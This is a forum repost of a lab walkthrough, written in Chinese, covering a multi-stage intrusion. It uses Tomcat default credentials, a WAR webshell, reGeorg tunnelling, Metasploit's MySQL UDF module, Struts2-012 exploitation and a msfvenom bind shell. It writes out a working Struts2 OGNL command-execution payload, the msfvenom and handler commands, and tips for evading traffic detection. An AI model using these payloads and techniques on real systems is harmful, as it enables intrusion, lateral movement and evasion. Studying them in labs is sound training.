安全矩阵

 找回密码
 立即注册
搜索
查看: 1055|回复: 0

记一次综合实验靶场攻略

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-9-8 10:28:01 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2022-9-8 10:42 编辑

记一次综合实验靶场攻略

合天网安实验室
2022-09-07 17:36 发表于湖南
转载自:记一次综合实验靶场攻略
以下文章来源于betasec ,作者betaseclabs

前两天朋友分享了一个实验靶场,感觉环境还不错,于是对测试过程进行了详细记录,靶场中涉及知识点总结如下:
  • War包制作
  • regeorg内网代理工具的使用
  • UDF漏洞利用
  • Struts2-012漏洞利用
  • Msfvenom模块的使用
本次实验靶场的网络拓扑结构如下图所示:
​​

01
获取web据点
首先访问朋友给定的web服务器端口,为tomcat应用的默认页面,如下图所示:

如果刚开始没有思路的话,可以百度搜索一下Tomcat示例页面相关漏洞情况。访问目标manager后台目录,尝试tomcat默认口令tomcat/tomcat进行登录:

登录成功之后,tomcat管理后台有个部署war包的功能,可以通过上传war包getshell,获取服务器权限。

在攻击机kali中生成war包后门,可以用自己的木马,也可使用kali自带webshell,默认路径:/usr/share/laudanum/
jar cvf shell.war xx.jsp

在WAR file to deploy 功能处上传并部署后门war包,单击选择文件,选择生成的war文件并确定,点击击deploy按钮就完成了上传。
验证是否上传成功,浏览器访问注意事项:根目录+war包文件名+jsp webshell文件名
比如我上传了的war包名为cmd.war,木马名为:cmd.jsp
在浏览器地址栏中:hxxp://x.x.x.x/cmd/cmd.jsp     

接下是连接上传的jsp一句话,使用C刀连接目标服务器的jsp木马
下载地址:https://github.com/Chora10/Cknife  可自行编译或者下载网上的程序虚拟机里执行。

菜刀成功连接后,会以树状形式显示webshell文件所处位置,如下图所示


添加代理
拿下web边界机以后,一般情况下,分两种情况:
  • 有内网:以此为跳板,攻击内网其他机器,摸清目标内网拓扑环境,拿下靶标系统;
  • 无内网:如果是项目,就可以收工了,不是的话,就可以作为代理池的一部分;
下面的情况属于有内网的环境,查看本机IP地址,发现两个网卡都有内网地址。
目标web服务器并无探测主机存活的工具,两种方式:
  • 自己上传端口扫描工具||脚本
  • 使用隧道代理工具,代理自己的工具进入目标内网中,做初步的信息搜集。
此处选择第二种方式,上传regeorg程序的tunnel.jsp脚本到目标服务器的shell目录下
web访问返回连接成功的信息(Georg says,’All seems fine’)   如下图所示,此为该工具流量硬特征,建议在下载后修改该字符串,或者使用升级版的neo-regeorg
https://github.com/L-codes/Neo-reGeorg      去特征且传输加密

使用regeorg工具建立隧道,命令如下:
Python regeorgsocksproxy.py -u   hxxp://x.x.x.x/tunnel.jsp -p xxxx
-u 代理木马链接;
-p指定传输端口;

在proxychains工具配置文件下添加regeorg打通的代理端口
vim /etc/proxychains.conf        在最后一行添加regeorg的配置好的传输端口即可


代理nmap到内网扫描172网段敏感端口,使用TCP全连接扫描
一些Nmap使用语法:http://mang0.me/archis/40a439a4/


03
UDF漏洞利用
通过扫描得到的MySQL应用信息,尝试弱口令连接,一样的思路哪个应用不会搜索哪里



查看security_file_priv是否配置命令:
show variables like '%secure%';
显示结果对应解释
  1. Secure_file_priv=null               //不允许导入导出文件
  2. Secure_file_priv='D:/'  //允许导入到指定目录
  3. Secure_file_priv=‘’               //允许到任意目录
  4. Secure_file_priv=”/”              //允许到根目录
复制代码

发现为空可以写任意目录,使用proxychains将msf代理到目标内网中,利用MySQL的UDF漏洞进行命令执行。


如果忘记模块,可以先search 需要的模块内容关键字
Use exploit/multi/mysql/mysql_udf_payload
查看未设置的参数   show  options

Password和rhost参数可以设置   


Set rhost 172.16.15.16Set password 123456  run

虽然显示没有会话,但是so文件已经传上去了,使用默认的MySQL命令连接,执行自定义函数,成功执行,说明udf提权成功。


04
S2-012漏洞利用

代理nmap到内网扫描10网段机器敏感端口


发现10.10.60.250:8080存在struts2-012漏洞


Struts2-012 payload 测试
  1. %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","-al"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }
复制代码
成功读取/etc/passwd文件


10.10.60.66和172.16.15.16一样的思路。


弱口令:admin/password



上传菜刀的jsp木马


使用蚁剑服务器管理工具连接成功



Msf生成Linux木马

  1. msfvenom -p linux/x86/meterpreter/bind_tcp rhost=10.10.60.66 lport=1234 -f elf > shell.elf
复制代码


生成完成后将该木马程序上传到目标服务器的web目录下,赋予权限,在msf中开启监听模块,执行程序,即可拿到会话
设置msf下handler模块必要的参数
  1. set payload linux/x86/meterpreter/bing_tcp
  2. Set rhost 10.10.60.66
  3. Set lport 1234
复制代码

  1. exploit -j        后台获取会话
  2. Sessions          可查看会话
  3.   -i                进入该会话
复制代码


本次实验到此结束,通过弱口令并结合应用特性拿到主机权限,使用内网代理工具建立隧道,探测内网段端口及对应漏洞,拿下对应主机权限。





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-28 20:42 , Processed in 0.013228 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表